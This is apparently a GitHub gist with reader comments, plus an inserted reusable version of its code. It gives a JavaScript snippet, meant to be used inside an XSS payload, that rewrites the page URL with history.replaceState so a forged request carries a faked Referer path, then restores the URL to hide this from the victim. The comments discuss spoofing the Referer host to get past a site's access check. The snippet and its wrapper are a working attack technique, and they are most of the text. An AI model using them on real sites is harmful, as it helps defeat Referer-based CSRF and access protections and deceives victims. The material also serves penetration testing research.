Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL (path, query and fragment) to restore after making
// the malicious request with the faked Referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
var savedHash = window.location.hash;
// Change the URL/history entry to control the Referer header value.
// Swap out "/this-is-my-fake-referer-value" for what you need. It must be a
// same-origin path: replaceState() throws a SecurityError for any other origin,
// so only the path and query of the Referer can be faked, never the host.
// The page's Referrer-Policy still applies: under the browser default
// (strict-origin-when-cross-origin) a cross-origin target only receives the
// origin, so the faked path is seen by same-origin endpoints
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send the malicious request with the faked Referer header value.
// NOTE: this assumes you're using some XHR request; adjust the target and
// body based on whatever your XSS payload is actually doing. The Referer is
// taken from the document URL when send() is called, so restoring the URL
// right after send() is safe even though the request completes asynchronously
var xhr = new XMLHttpRequest();
xhr.open('POST', '/target-endpoint', true); // placeholder: your payload's target
var body = 'param=value';                   // placeholder: your payload's body
xhr.send(body);
// Restore the URL value to the original one before the XSS victim
// notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch + savedHash);
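As an added example that is not part of the gist or the TrustedSec post, the same replaceState trick wrapped in a reusable function, together with a model of which Referer value actually reaches the server under the browser default referrer policy. `location`, `history` and the request are injected, so the function runs in a browser (pass `window.location`, `window.history` and a fetch call) as well as stand-alone here against constructed stand-ins. All names (`withFakedReferer`, `refererFor`, `makeFakeWindow`, the `victim.example` / `collector.example` URLs) are hypothetical.

```javascript
// Added example, not the gist author's code. The replaceState trick from the
// snippet above, wrapped in a reusable function, plus a model of which Referer
// value actually reaches the server under the browser default policy.
// `loc`, `hist` and `send` are injected so the same function runs in a browser
// (pass window.location, window.history and a fetch call) or stand-alone with
// the constructed stand-ins below. All names here are hypothetical.

function withFakedReferer(fakePath, send, loc, hist) {
  // replaceState() only accepts same-origin URLs (anything else throws a
  // SecurityError), so only the path/query part of the Referer is controllable.
  // Reject absolute and protocol-relative values before touching history.
  if (typeof fakePath !== 'string' || !fakePath.startsWith('/') || fakePath.startsWith('//')) {
    throw new Error('fakePath must be an origin-relative path such as "/admin/export"');
  }
  const saved = loc.pathname + loc.search + loc.hash;   // keep the fragment too
  hist.replaceState(null, '', fakePath);
  try {
    // The Referer is sampled from the document URL when the request starts,
    // so the real URL can go back as soon as send() has been called.
    return send();
  } finally {
    hist.replaceState(null, '', saved);                 // restore even on error
  }
}

// Referer value under strict-origin-when-cross-origin, the default policy in
// current Chrome, Firefox and Safari: full URL (minus fragment and credentials)
// for same-origin requests, origin only for cross-origin ones, nothing on an
// HTTPS->HTTP downgrade. This is why the faked path only reaches same-origin
// endpoints unless the page sets a looser Referrer-Policy.
function refererFor(documentHref, targetHref) {
  const doc = new URL(documentHref);
  const target = new URL(targetHref);
  doc.hash = '';
  doc.username = '';
  doc.password = '';
  if (doc.origin === target.origin) return doc.href;
  if (doc.protocol === 'https:' && target.protocol === 'http:') return '';
  return doc.origin + '/';
}

// Constructed stand-in for window.location / window.history so the example
// runs outside a browser; it enforces the same-origin rule of replaceState().
function makeFakeWindow(initialHref) {
  const current = new URL(initialHref);
  const loc = {
    get href() { return current.href; },
    get pathname() { return current.pathname; },
    get search() { return current.search; },
    get hash() { return current.hash; },
  };
  const hist = {
    replaceState(_state, _unused, url) {
      const resolved = new URL(url, current.href);
      if (resolved.origin !== current.origin) {
        throw new Error('SecurityError: replaceState() rejects cross-origin URLs');
      }
      current.href = resolved.href;
    },
  };
  return { loc, hist };
}

// Drive the helper against a constructed victim page and record the Referer
// two different targets would receive while the fake path is in place.
function demo() {
  const { loc, hist } = makeFakeWindow('https://victim.example/account/settings?tab=1#top');
  const seen = [];
  const sendTo = (target) => () => { seen.push(refererFor(loc.href, target)); };
  withFakedReferer('/admin/export', sendTo('https://victim.example/api/export'), loc, hist);
  withFakedReferer('/admin/export', sendTo('https://collector.example/log'), loc, hist);
  return { seen, restoredHref: loc.href };
}

const result = demo();
console.log(result.seen);          // same-origin target sees the faked path, cross-origin target sees the origin only
console.log(result.restoredHref);  // the victim's original URL is back in the location bar
```

In a real page the stand-ins are replaced by `window.location` and `window.history`, and `send` is the payload's own `fetch`/XHR call; `refererFor` is only a model of what the browser does and is not needed in the payload. The guard on `fakePath` makes the limitation discussed in the comments below explicit: the host portion of the Referer is never under the attacker's control from script, and the `try/finally` makes sure the location bar is restored even if the request throws.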
@hoodoer hoodoer commented Oct 6, 2020

A blog walking through this in use can be found at:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/

@alkanna alkanna commented Feb 7, 2021

Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the Referer using JavaScript?
There is a url I need to be able to access directly, however, the target host does not let me access it directly unless the referer is said host.

@hoodoer hoodoer commented Feb 7, 2021

@alkanna I'm afraid not, just the relative path.

@hoodoer hoodoer commented Feb 11, 2021

@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but might be possible. Would be fun to play with for sure.